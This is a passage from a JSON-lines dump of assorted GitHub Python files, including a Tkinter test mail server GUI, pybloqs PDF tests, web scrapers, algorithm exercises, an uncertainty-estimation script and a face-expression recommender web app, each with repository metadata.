mail_server_tool import run_server\nimport multiprocessing\n\n\nclass Application(tk.Frame):\n is_started = False\n server = None\n\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.set_options()\n\n self.port_input = None\n self.start = None\n\n self.create_widgets()\n self.pack()\n\n def set_options(self):\n self.master.title('Py Test Mail Server')\n self.master.minsize(width=600, height=250)\n self.master.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n self.master['bg'] = 'black'\n\n def on_closing(self):\n if self.is_started:\n self.server.terminate()\n self.master.destroy()\n\n def create_widgets(self):\n\n port_label = tk.Label(self)\n port_label[\"text\"] = \"Port to listen on: \"\n port_label.grid(sticky=\"W\", row=0, column=1, padx=10, pady=25)\n\n self.port_input = tk.Spinbox(self, width=8, from_=0, to=65535, textvariable=tk.DoubleVar(value=25))\n self.port_input.grid(sticky=\"W\", row=0, column=2, padx=10, pady=25)\n\n output_label = tk.Label(self)\n output_label[\"text\"] = \"Path of received emails: \"\n output_label.grid(sticky=\"W\", row=1, column=1, padx=10, pady=25)\n\n output_input = tk.Entry(self, width=70)\n output_input.insert(0, str(pathlib.Path(__file__).parent.absolute()) + \"\\\\\" + MESSAGE_DIR)\n output_input.grid(row=1, column=2, padx=10, pady=20)\n output_input.bind(\"\", lambda e: \"break\")\n\n self.start = tk.Button(self, text=\"Start Server\", width=12, height=2,\n command=self.start_server, borderwidth=0, bg='#C6E8E8')\n self.start.grid(row=2, pady=50, columnspan=2, sticky='E')\n\n quit_button = tk.Button(self, text=\"QUIT\", fg=\"red\", width=12, height=2,\n command=self.on_closing, borderwidth=0, bg='#C6E8E8')\n quit_button.grid(row=3, column=2, padx=50, pady=20, columnspan=2, sticky='E')\n\n def start_server(self):\n \"\"\"\n Starts the email server and sets the GUI appropriately.\n \"\"\"\n if self.is_started:\n self.server.terminate()\n self.start[\"text\"] = \"Start Server\"\n self.port_input.config(state='normal')\n else:\n if not self.port_input.get().isdigit():\n return\n\n # Start email server on another thread\n self.server = multiprocessing.Process(target=run, args=(int(self.port_input.get()),))\n self.server.start()\n self.start[\"text\"] = \"Stop Server\"\n self.port_input.config(state='disabled')\n\n self.is_started = not self.is_started\n\n\ndef run(port):\n \"\"\"\n Runs the server on *port*.\n \"\"\"\n run_server(HOST, port)\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n app = Application(master=root)\n app.mainloop()\n","repo_name":"bxpluse/PyTestMailServer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7115254794","text":"from io import open\nimport logging\nimport os\nimport subprocess\nimport uuid\n\nfrom mock import patch, Mock\nfrom six import text_type\nimport pytest\n\nimport numpy as np\nimport pybloqs as p\nfrom pybloqs.htmlconv.html_converter import LANDSCAPE, HTMLConverter\n\n\n# set up logging output to help with external function calls\nlogging.basicConfig(level=logging.INFO)\n\nA4_LONG_PTS = 842\nA4_SHORT_PTS = 595\n\n\ndef run_pdfinfo(file_name):\n cmd = [\"pdfinfo\", file_name]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n stdout, _ = proc.communicate()\n output = dict([tuple(e.strip() for e in s.decode().split(':', 1)) for s in stdout.splitlines()])\n return output\n\n\ndef run_pdftotext(file_name):\n # PyPDF2 is not successful at reading text test PDF. Using pdftotext from same package as pdfinfo.\n cmd = [\"pdftotext\", file_name, '-']\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n stdout, _ = proc.communicate()\n output = stdout.decode().splitlines()\n return output\n\n\ndef test_write_html_to_tempfile():\n block = Mock()\n block._id = 'test_id'\n content = 'dummy'\n\n file_name = HTMLConverter.write_html_to_tempfile(block, text_type(content))\n assert os.path.split(file_name)[-1].startswith('test_id')\n assert file_name.endswith('html')\n with open(file_name, 'r') as f:\n assert f.read() == content\n\n # Cleanup\n os.remove(file_name)\n\n\n@pytest.mark.parametrize('converter_name', ['chrome_headless', 'wkhtmltopdf'])\ndef test_pdf_converter_output(converter_name):\n with patch('pybloqs.htmlconv.user_config', {'pdf_converter': converter_name}):\n # Test if header and footer are included twice (once per page)\n page_one = p.Block('Lorem', styles={\"page-break-after\": \"always\"})\n page_two = p.Block('ipsum')\n body = p.VStack([page_one, page_two])\n header_text = uuid.uuid4().hex\n header = p.Block(header_text)\n footer_text = uuid.uuid4().hex\n footer = p.Block(footer_text, styles={'background': 'red'})\n\n pdf_file = body.save(fmt='pdf',\n header_block=header, header_spacing=50,\n footer_block=footer, footer_spacing=50)\n output = run_pdftotext(pdf_file)\n assert output.count(header_text) == 2\n assert output.count(footer_text) == 2\n\n output = run_pdfinfo(pdf_file)\n assert output['Pages'] == '2'\n page_width, _, page_height, _, label = output['Page size'].split(' ')\n # Rounding errors between different converters. Need to check approximate values.\n assert np.isclose(float(page_height), A4_LONG_PTS, atol=0.1)\n assert np.isclose(float(page_width), A4_SHORT_PTS, atol=0.1)\n assert label == '(A4)'\n\n # Variation: Check that landscape format works\n pdf_file = body.save(fmt='pdf', orientation=LANDSCAPE)\n output = run_pdfinfo(pdf_file)\n page_width, _, page_height, _, label = output['Page size'].split(' ')\n assert np.isclose(float(page_height), A4_SHORT_PTS, atol=0.1)\n assert np.isclose(float(page_width), A4_LONG_PTS, atol=0.1)\n assert label == '(A4)'\n\n # Variation: Check that page size works\n pdf_file = body.save(fmt='pdf', pdf_page_size='Legal')\n output = run_pdfinfo(pdf_file)\n # No rounding errors between converters for 'Legal' format\n assert output['Page size'] == '612 x 1008 pts'\n\n\ndef test_image_output():\n block = p.Block('Lorem ipsum')\n png_file = block.save(fmt='png')\n with open(png_file, 'rb') as f:\n raw_data = f.read()\n assert raw_data[1:4] == b'PNG'\n\n jpg_file = block.save(fmt='jpg')\n with open(jpg_file, 'rb') as f:\n raw_data = f.read()\n assert raw_data[6:10] == b'JFIF'\n\n svg_file = block.save(fmt='svg')\n with open(svg_file, 'rb') as f:\n raw_data = f.read()\n assert b'= 4.5 and int(rate_cnt) >= 100:\n print(f\"제품명 : {name}\")\n print(f\"가격 : {price}\")\n print(f\"평점 : {rate}점 ({rate_cnt}개)\")\n print(\"링크 : {}\".format(\"http://www.coupang.com\", link))\n \n print(f\"-\"*100)\n","repo_name":"yacmov/Self_Study_Python","sub_path":"04_Web_Crawling/01_Web_Basic/11_bs4_coupang.pages.py","file_name":"11_bs4_coupang.pages.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29222624459","text":"valx = input(\"Type value of x : \")\nvaly = input(\"Type value of y : \")\n\n\ndef karatsuba(x,y):\n\tif(len(x) == 1 or len(y) == 1):\n\t\treturn int(x) * int(y)\n\tmidx = int(len(x) / 2)\n\tmidy = int(len(y) / 2)\n\ta = x[:midx]\n\tb = x[midx:]\n\tc = y[:midy]\n\td = y[midy:]\n\tvalac = karatsuba(a,c)\n\tvalbd = karatsuba(b,d)\n\tdiff = str((int(a) + int(b)) * (int(c) + int(d)) - valac - valbd)\n\tval1 = str(valac).ljust(len(str(valac))+len(x), '0')\n\tval2 = diff.ljust(len(diff)+midx, '0')\n\ttotal = int(val1) + int(val2) + valbd\n\treturn total\n\n\nprint(karatsuba(valx,valy))","repo_name":"poooh/DSA","sub_path":"karatsuba.py","file_name":"karatsuba.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35458775974","text":"\nimport collections\n\nclass TrieNode:\n def __init__(self):\n self.isWord = False\n self.children = {}\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n node = self.root\n for ch in word:\n if ch not in node.children:\n node.children[ch] = TrieNode()\n node = node.children[ch]\n node.isWord = True\n\n def search(self, word):\n node = self.root\n for ch in word:\n if ch not in node.children:\n return False\n node = node.children[ch]\n return node.isWord\n\n\nclass MagicDictionaryTony:\n def __init__(self):\n self.trie = Trie()\n\n def buildDict(self, dictionary) -> None:\n for word in dictionary:\n self.trie.insert(word)\n\n def search(self, word: str) -> bool:\n self.modified = False\n return self.dfs(self.trie.root, 0, 1, word)\n\n def dfs(self, node, i, k, word):\n if i == len(word):\n return node.isWord and k == 0\n\n # can not modify anymore\n if k == 0:\n if word[i] in node.children:\n return self.dfs(node.children[word[i]], i + 1, k, word)\n else:\n # another diff\n return False\n else:\n for ch in node.children:\n # need to modify, k -= 1\n if ch != word[i]:\n k -= 1\n if self.dfs(node.children[ch], i + 1, k, word):\n return True\n return False\n\n\n\nclass MagicDictionaryRika:\n def __init__(self):\n self.trie = Trie()\n\n def buildDict(self, dictionary) -> None:\n for word in dictionary:\n self.trie.insert(word)\n\n def search(self, searchWord: str) -> bool:\n node = self.trie.root\n return self.dfs(node, searchWord, 0, 1)\n\n def dfs(self, node, word, i, k):\n if k < 0:\n return False\n\n if i == len(word):\n return k == 0 and node.isWord\n\n ch = word[i]\n if ch in node.children:\n if self.dfs(node.children[ch], word, i + 1, k):\n return True\n\n for child in node.children:\n if ch != child and self.dfs(node.children[child], word, i + 1, k - 1):\n return True\n return False\n\n\nclass MagicDictionary2:\n def __init__(self):\n self.table = collections.defaultdict(set)\n\n def buildDict(self, dictionary) -> None:\n for word in dictionary:\n n = len(word)\n if n not in self.table:\n self.table[n] = set()\n self.table[n].add(word)\n\n def search(self, searchWord: str) -> bool:\n n = len(searchWord)\n if n not in self.table:\n return False\n\n for s in self.table[n]:\n count = 0\n for i in range(n):\n if searchWord[i] != s[i]:\n count += 1\n\n if count == 1:\n return True\n\n return False\n\n\n\n","repo_name":"Taoge123/OptimizedLeetcode","sub_path":"LeetcodeNew/python/LC_676.py","file_name":"LC_676.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"38189768959","text":"import argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom data import *\nfrom networks import *\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Estimate uncertainty for data samples.')\n parser.add_argument('model_path', type=str,\n help='Path to uncertainty estimation model.',\n metavar='path/to/model.pth')\n parser.add_argument('subset', type=str,\n help='Subset for which to estimate uncertainty.',\n choices=['all', 'val'],\n metavar='')\n parser.add_argument('save_target', type=str,\n help='File to save estimations.',\n metavar='path/to/estimations.npz')\n parser.add_argument('--mc_dropout_samples', type=int,\n help='Number of MC samples for dropout.',\n metavar='',\n default=50)\n parser.add_argument('--visualize_estimations', action='store_true',\n help='Plot samples and their uncertainty estimations.',\n default=False)\n args = parser.parse_args()\n\n # Load data\n if args.subset == 'val':\n (_, data_loader, _, data_clean_loader, _) = load_cifar10(\n batch_size=1, train_shuffle=False)\n if args.subset == 'all':\n (data_loader, _, data_clean_loader, _, _) = load_cifar10(\n batch_size=1, split_train=False, train_shuffle=False)\n\n # CIFAR-10 classes\n classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog',\n 'horse', 'ship', 'truck')\n\n # Load model state\n model = AleatoricCNN(in_channels=3, n_classes=10)\n criterion = nn.NLLLoss()\n checkpoint = torch.load(args.model_path, map_location='cpu')\n model.load_state_dict(checkpoint['model_state_dict'])\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n mode = model.to(device)\n model.eval()\n\n predictive_uncertainty_samples = []\n aleatoric_uncertainty_samples = []\n epistemic_uncertainty_samples = []\n loss_samples = []\n pred_labels = []\n clean_labels = []\n noisy_labels = []\n\n # MC dropout Sampling - enable dropout during eval \n model.apply(lambda m: m.train() if type(m) == nn.Dropout else None)\n images, _ = iter(data_loader).next()\n output_size = model(images.to(device)).size()\n\n print('[*] Predicting uncertainty for samples...')\n for i, (images, labels) in enumerate(data_loader):\n if (i + 1) % 100 == 0:\n print('[{}/{}]'.format(i + 1, len(data_loader)))\n images = images.to(device)\n labels = labels.to(device)\n\n mc_probs = torch.zeros(output_size, device=device)\n aleatoric = 0\n # MC samples of network outputs\n with torch.no_grad():\n for t in range(args.mc_dropout_samples):\n pred_log_probs = model(images)\n mc_probs = mc_probs + torch.exp(pred_log_probs)\n\n # Accumulate the sample entropies to estimate aleatoric uncertainty\n sample_entropy = torch.distributions.Categorical(\n probs=torch.exp(pred_log_probs)).entropy().item()\n aleatoric = aleatoric + sample_entropy\n\n # Compute uncertainties and losses\n mc_probs = mc_probs / args.mc_dropout_samples\n aleatoric = aleatoric / args.mc_dropout_samples\n predictive = torch.distributions.Categorical(\n probs=mc_probs).entropy().item()\n epistemic = predictive - aleatoric\n model_loss = criterion(mc_probs, labels)\n\n predictive_uncertainty_samples.append(predictive)\n aleatoric_uncertainty_samples.append(aleatoric)\n epistemic_uncertainty_samples.append(epistemic)\n loss_samples.append(model_loss.item())\n pred_labels.append(np.argmax(mc_probs.cpu()))\n noisy_labels.append(labels.cpu().item())\n clean_labels.append(data_clean_loader.dataset[i][1])\n\n # Visualize input labels and predicted uncertainty\n if args.visualize_estimations:\n img_np = np.transpose(images.cpu().numpy()[0, :], (1, 2, 0))\n plt.imshow(img_np / 2 + 0.5)\n plt.title('Noisy {} Correct {}: Predicted: {}'.format(\n classes[labels.cpu().item()],\n classes[data_clean_loader.dataset[i][1]],\n classes[np.argmax(mc_probs.cpu())]))\n print('Predictive: {:.4f}'.format(predictive), \n 'Aleatoric: {:.4f}'.format(aleatoric),\n 'Epistemic: {:.4f}'.format(epistemic))\n plt.show()\n\n# Save estimation results to target fle\npredictive_uncertainty_samples_array = np.array(predictive_uncertainty_samples)\naleatoric_uncertainty_samples_array = np.array(aleatoric_uncertainty_samples)\nepistemic_uncertainty_samples_array = np.array(epistemic_uncertainty_samples)\nloss_samples_array = np.array(loss_samples)\npred_labels_array = np.array(pred_labels)\nnoisy_labels_array = np.array(noisy_labels)\nclean_labels_array = np.array(clean_labels)\n\nnp.savez(args.save_target,\n predictive_uncertainty_samples_array,\n aleatoric_uncertainty_samples_array,\n epistemic_uncertainty_samples_array,\n loss_samples_array,\n pred_labels_array,\n noisy_labels_array,\n clean_labels_array)\n\n","repo_name":"AlexGraikos/uncertainty_label_noise","sub_path":"estimate_uncertainty.py","file_name":"estimate_uncertainty.py","file_ext":"py","file_size_in_byte":5575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11137948143","text":"import json\nfrom pathlib import Path\nimport typing as tp\n\nimport cv2\n\nfrom src.data_steam import DataStream\n\n\ndef main():\n with open(\"to_label.json\") as f:\n video_to_ids: tp.Dict[str, tp.List[int]] = json.load(f)\n root_path = Path.cwd() / \"frames\"\n if not root_path.exists():\n root_path.mkdir()\n for video, ids in video_to_ids.items():\n istream = DataStream(\"data/\" + video)\n for idx in ids:\n sample = istream[idx]\n save_path = f\"frames/{video}_{idx}.jpg\"\n cv2.imwrite(save_path, cv2.cvtColor(sample[\"color_frame\"], cv2.COLOR_BGR2RGB))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vbakhteev/agrocode_hack_harvester_3d","sub_path":"move_frames_by_id.py","file_name":"move_frames_by_id.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"17029849669","text":"import argparse\nimport os\n\nfrom pip._vendor import requests\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport time\nimport json\n\n\nclass WebScrapper:\n\n def __init__(self, parent_ip=\"127.0.0.1:8000\"):\n time.sleep(5)\n self.parent_ip = parent_ip\n self.web_driver = webdriver.Remote(\n command_executor='http://firefox:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.FIREFOX)\n\n def retrieve_url(self):\n url_to_retrieve = requests.get(f\"{self.parent_ip}/scrapper/latest_url\")\n\n return url_to_retrieve\n\n def scrap_url(self):\n while self.retrieve_url():\n blob = self.retrieve_url()\n self.web_driver.get(f\"https://www.olx.pl/oferta/{blob}.html\")\n\n offer_titlebox = self.web_driver.find_element_by_xpath('//div[@class=\"offer-titlebox\"]')\n\n title = offer_titlebox.find_element_by_tag_name(\"h1\").text\n price = offer_titlebox.find_element_by_xpath('//strong[@class=pricelabel]').text\n quality = self.web_driver.find_element_by_xpath('//strong[@class=\"offer-details__value\"]').text\n\n offer_bottombar__items = self.web_driver.find_element_by_id(\"offerbottombar\")\n create_date = offer_bottombar__items.find_element_by_tag_name('em').find_element_by_tag_name('strong').text\n views = offer_bottombar__items.find_element_by_xpath(\n '//span[@class=\"offer-bottombar__counter\"]/strong').text\n\n post_data = {\"url\": blob, \"title\": title, \"price\": price, \"quality\": quality, \"created\": create_date,\n \"views\": views}\n\n requests.post(f\"{self.parent_ip}/scrapper/add_data\", json=json.dumps(post_data))\n\n\nif __name__ == \"__main__\":\n\n # web_scrapper = WebScrapper(parent_ip=os.environ['MASTER_IP'])\n web_scrapper = WebScrapper(parent_ip=\"127.0.0.1:8000\")\n\n web_scrapper.scrap_url()\n","repo_name":"lukBaszak/scrapper-slave","sub_path":"parsing_service.py","file_name":"parsing_service.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1472447272","text":"'''\n31c2dbb2e67188e37974b61ba3de791f\n'''\n\nimport sys\nimport os\n\n\ndef file_walker(root_dir):\n file_list = []\n for root, dirs, files in os.walk(root_dir, topdown=True):\n for name in files:\n file_list.append(os.path.join(root, name))\n for name in dirs:\n os.path.join(root, name)\n return file_list\n# end \n\n\nif __name__ == '__main__':\n root_path = '/root/PycharmProjects'\n\n # step 1: get list of files\n FILES = fire_walker(root_path)\n print('TOT_FILES: {}'.format(str(len(FILES))))\n\n\n","repo_name":"ClaudeCundiff/pythonsnippets","sub_path":"file_walker.py","file_name":"file_walker.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22036700863","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Models.ConvNeXt.Module.DropPath import DropPath\nfrom Models.ConvNeXt.Module.LayerNorm import LayerNorm\n\n\nclass ConvNeXtBlock(nn.Module):\n r\"\"\" ConvNeXt Block. There are two equivalent implementations:\n (1) DwConv -> LayerNorm (channels_first) -> 1x1 Conv -> GELU -> 1x1 Conv; all in (N, C, H, W)\n (2) DwConv -> Permute to (N, H, W, C); LayerNorm (channels_last) -> Linear -> GELU -> Linear; Permute back\n We use (2) as we find it slightly faster in PyTorch\n\n Args:\n dim (int): Number of input channels.\n drop_rate (float): Stochastic depth rate. Default: 0.0\n layer_scale_init_value (float): Init value for Layer Scale. Default: 1e-6.\n \"\"\"\n\n def __init__(self, dim, drop_rate=0., layer_scale_init_value=1e-6):\n super().__init__()\n self.dwconv = nn.Conv2d(dim, dim, kernel_size=7, padding=3, groups=dim) # depthwise conv\n self.norm = LayerNorm(dim, eps=1e-6, data_format=\"channels_last\")\n self.pwconv1 = nn.Linear(dim, 4 * dim) # pointwise/1x1 convs, implemented with linear layers\n self.act = nn.GELU()\n self.pwconv2 = nn.Linear(4 * dim, dim)\n self.gamma = nn.Parameter(layer_scale_init_value * torch.ones((dim,)),\n requires_grad=True) if layer_scale_init_value > 0 else None\n self.drop_path = DropPath(drop_rate) if drop_rate > 0. else nn.Identity()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n shortcut = x\n x = self.dwconv(x)\n x = x.permute(0, 2, 3, 1) # [N, C, H, W] -> [N, H, W, C]\n x = self.norm(x)\n x = self.pwconv1(x)\n x = self.act(x)\n x = self.pwconv2(x)\n if self.gamma is not None:\n x = self.gamma * x\n x = x.permute(0, 3, 1, 2) # [N, H, W, C] -> [N, C, H, W]\n\n x = shortcut + self.drop_path(x)\n return x\n","repo_name":"Karenina-na/Deep-Learning-Framework","sub_path":"Models/ConvNeXt/Module/ConvNeXtBlock.py","file_name":"ConvNeXtBlock.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"42952405890","text":"'''\nThis script launches a web application that captures faces from a webcam or an image and returns \nthe most similar face expressions from an art database.\n\nAuthor: Pepe Ballesteros\nLast update: 03.05.2022\n'''\nimport argparse\nimport sys\nimport gradio as gr\nimport mediapipe as mp\nimport cv2\nimport numpy as np\nfrom paramiko import Channel\nimport recommender_system as rs\nimport LPDatabaseGen\n\nparser = argparse.ArgumentParser(prog = 'FaceArt', description='FaceArt: A face expression recommender system', epilog = 'Enjoy!')\nparser.add_argument('-d', '--dataset', type = str, help='Indicate the name of the folder where the images are located (Required)', required=True)\nparser.add_argument('-s', '--save', help='Compute the landmark point database of the images and save it in the output folder. Required every time a new image dataset is used', action='store_true') \nparser.add_argument('-i', '--input', type = str, help='Indicate webcam or image. Whether to use the webcam or another image as an input (default is webcam)') \nargs = parser.parse_args()\n\ndef extract_face(image):\n '''\n Function that takes an input image snapshot form Gradio (numpy array) and returns the cropped image of the face\n '''\n mp_face_detection = mp.solutions.face_detection\n height, width, channel = image.shape\n with mp_face_detection.FaceDetection(\n model_selection=1, min_detection_confidence=0.4) as face_detection:\n results = face_detection.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n if results.detections:\n annotated_image = image.copy()\n for detection in results.detections:\n bBox = detection.location_data.relative_bounding_box\n x,y,w,h = int(bBox.xmin * width), int(bBox.ymin * height), int(bBox.width * width), int(bBox.height * height)\n aug_factor_x = int(0.2 * w)\n aug_factor_y = int(0.2 * h)\n cropped_image = annotated_image[y-aug_factor_y:y+h+aug_factor_y,x-aug_factor_x:x+w+aug_factor_x]\n return cropped_image\n\ndef extract_mesh(image):\n '''\n Function that takes an input image snapshot form Gradio (numpy array) and returns Landmark Points as a np array\n and the mesh of the cropped face with white background\n '''\n mp_face_mesh = mp.solutions.face_mesh\n mp_drawing = mp.solutions.drawing_utils\n mp_drawing_styles = mp.solutions.drawing_styles\n coordinates_list= []\n with mp_face_mesh.FaceMesh( static_image_mode=True, max_num_faces=1,refine_landmarks=True,min_detection_confidence=0.4) as face_mesh:\n w,h,c = image.shape\n results = face_mesh.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n white_background = np.zeros([w,h,c],dtype=np.uint8)\n white_background.fill(255)\n if results.multi_face_landmarks:\n for face_landmarks in results.multi_face_landmarks:\n for landmark in face_landmarks.landmark:\n coordinates_list.append(landmark.x)\n coordinates_list.append(landmark.y)\n # Drawing\n mp_drawing.draw_landmarks(\n image= white_background,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_TESSELATION,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_tesselation_style()\n )\n return np.array(coordinates_list, dtype=np.float32), white_background\n\ndef get_recommended_images(files):\n imgs = []\n for file in files:\n img = cv2.imread(file)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n imgs.append(img)\n return imgs\n\ndef webapp(image):\n # Locate the face in the input image\n cropped = extract_face(image)\n # Calculate LP\n coordinates, white_background = extract_mesh(cropped)\n # Get recommendations\n recomended = rs.get_recommendations(coordinates, df, n=3)\n files = rs.get_image_names(df, recomended)\n recomendation_images = get_recommended_images(files)\n meshs = rs.get_mesh(files)\n meshs = rs.scale_images(meshs)\n recomendation_images = rs.scale_images(recomendation_images)\n im_vh = rs.concat_vh([[recomendation_images[0], recomendation_images[1], recomendation_images[2]],\n [meshs[0], meshs[1], meshs[2]]])\n return white_background, im_vh\n\n# Setup variables\nSAVE_OUTPUT_CSV = True if args.save else False\ndataset_path = args.dataset\nuser_input = args.input if args.input else 'webcam'\ndescription = \"\"\"\n Pepe Ballesteros Zapata - Digital Visual Studies\n \"\"\"\n\nif SAVE_OUTPUT_CSV:\n df = LPDatabaseGen.main(dataset_path)\nelse:\n df = rs.load_dataset('outputs/' + dataset_path + '.csv')\n\n# Web app Launching\ndef main():\n if user_input == 'webcam':\n input = gr.inputs.Image(shape=(640,480), source=\"webcam\", type=\"numpy\")\n else:\n input = gr.inputs.Image(type=\"numpy\")\n\n output1 = gr.outputs.Image(type=\"numpy\", label='Detected Mesh')\n output2 = gr.outputs.Image(type=\"numpy\", label='Top 3 Recommendations')\n app = gr.Interface(fn = webapp, inputs = input , outputs = [output1,output2], title='Face Art', theme = 'dark-peach',\n description=description, layout='aligned')\n try:\n app.launch(share=True)\n except KeyboardInterrupt:\n app.close()\n sys.exit()\n\nif __name__ == \"__main__\":\n main()","repo_name":"pepeballesterostel/FaceArt","sub_path":"FaceArt.py","file_name":"FaceArt.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37732178845","text":"import os\nimport sys\nimport platform\n\nfrom pytigon_lib.schtools.platform_info import platform_name\n\nif platform_name() != \"Emscripten\":\n import httpx\n\nimport tarfile\nimport zipfile\nimport io\nimport sys\nimport importlib\nfrom shutil import copyfile\nfrom pathlib import Path\nfrom pytigon_lib.schtools.process import run, py_run\nfrom pytigon_lib.schtools.main_paths import get_main_paths, get_python_version\n\n\nCOMPILER_INITIALIZED = False\n\n\ndef init_compiler():\n global COMPILER_INITIALIZED\n if not COMPILER_INITIALIZED:\n import ziglang\n\n os.environ[\"PY_ZIG\"] = os.path.join(ziglang.__path__[0], \"zig\")\n COMPILER_INITIALIZED = True\n\n\ndef compile(build_zig, output_file_name=None):\n cmd = [\n sys.executable,\n \"-m\",\n \"ziglang\",\n \"build\",\n \"--prefix-exe-dir\",\n \"../../\",\n \"--prefix-lib-dir\",\n \"../../\",\n ]\n base_path = os.path.dirname(build_zig)\n cwd = os.getcwd()\n os.chdir(base_path)\n (ret_code, output, err) = run(cmd)\n os.chdir(cwd)\n return (ret_code, output, err)\n\n\ndef make(data_path, files_path, prj_name=None):\n if platform_name() == \"Emscripten\":\n return None, None, None\n ret_output = []\n ret_errors = []\n ret = 0\n\n p = Path(files_path)\n\n fl = p.glob(\"**/build.zig\")\n for pos in fl:\n init_compiler()\n c_filename = p.joinpath(pos).as_posix()\n if os.path.exists(c_filename):\n (ret_code, output, err) = compile(c_filename)\n if ret_code:\n ret = ret_code\n if output:\n for pos2 in output:\n ret_output.append(pos2)\n if err:\n for pos2 in err:\n ret_errors.append(pos2)\n\n fl = p.glob(\"**/build.py\")\n for pos in fl:\n init_compiler()\n c_filename = p.joinpath(pos).as_posix()\n if os.path.exists(c_filename):\n if prj_name:\n cmd = [sys.executable, \"build.py\"]\n base_path = os.path.dirname(pos)\n cwd = os.getcwd()\n os.chdir(base_path)\n (ret_code, output, err) = run(cmd)\n os.chdir(cwd)\n\n if ret_code:\n ret = ret_code\n if output:\n for pos2 in output:\n ret_output.append(pos2)\n if err:\n for pos2 in err:\n ret_errors.append(pos2)\n\n fl = p.glob(\"**/setup.py\")\n for pos in fl:\n init_compiler()\n c_filename = p.joinpath(pos).as_posix()\n if os.path.exists(c_filename):\n if prj_name:\n cmd = [\n sys.executable,\n \"-m\",\n \"pytigon.ptig\",\n \"pip_%s\" % prj_name,\n \"install\",\n \"-e\",\n c_filename,\n ]\n base_path = os.path.dirname(pos)\n cwd = os.getcwd()\n os.chdir(base_path)\n (ret_code, output, err) = run(cmd)\n os.chdir(cwd)\n\n if ret_code:\n ret = ret_code\n if output:\n for pos2 in output:\n ret_output.append(pos2)\n if err:\n for pos2 in err:\n ret_errors.append(pos2)\n\n return ret, ret_output, ret_errors\n\n\ndef import_plugin(plugin_name, prj_name=None):\n cfg = get_main_paths()\n pytigon_cfg = [cfg[\"PYTIGON_PATH\"], \"appdata\", \"plugins\"]\n data_path = cfg[\"DATA_PATH\"]\n data_cfg = [data_path, \"plugins\"]\n prj_cfg = [cfg[\"PRJ_PATH\"], prj_name, \"applib\"]\n prj_cfg_alt = [cfg[\"PRJ_PATH_ALT\"], prj_name, \"applib\"]\n\n if prj_name:\n folders = [prj_cfg, prj_cfg_alt]\n else:\n folders = [pytigon_cfg, data_cfg]\n\n path = None\n for folder in folders:\n plugins_path = os.path.join(folder[0], *folder[1:])\n if prj_name:\n plugin_path = os.path.join(plugins_path, *plugin_name.split(\".\")[:-1])\n else:\n plugin_path = os.path.join(plugins_path, *plugin_name.split(\".\"))\n if os.path.exists(plugin_path):\n path = plugins_path\n path2 = plugin_path\n break\n\n if not path:\n return None\n\n try:\n m = importlib.import_module(plugin_name, package=None)\n return m\n except:\n make(data_path, path2, prj_name)\n try:\n m = importlib.import_module(plugin_name, package=None)\n return m\n except:\n pass\n return None\n","repo_name":"Splawik/pytigon-lib","sub_path":"pytigon_lib/schtools/cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7107341259","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n d = {0:1}\n sums,ans = 0,0\n for num in nums:\n sums+=num\n if sums-k in d:\n ans+=d[sums-k]\n d[sums]=d.get(sums,0)+1\n return ans","repo_name":"ruisunyc/leetcode_Solution","sub_path":"leetcode/0560.和为K的子数组/0560-和为K的子数组.py","file_name":"0560-和为K的子数组.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22782476863","text":"#!/usr/bin/env python\nimport numpy as np\ntol = 1e-8\n\n\ndef rotation_3d(argZ,argY,argX):\n '''\n creates a matrix which rotates a coordinate in 3 dimensional 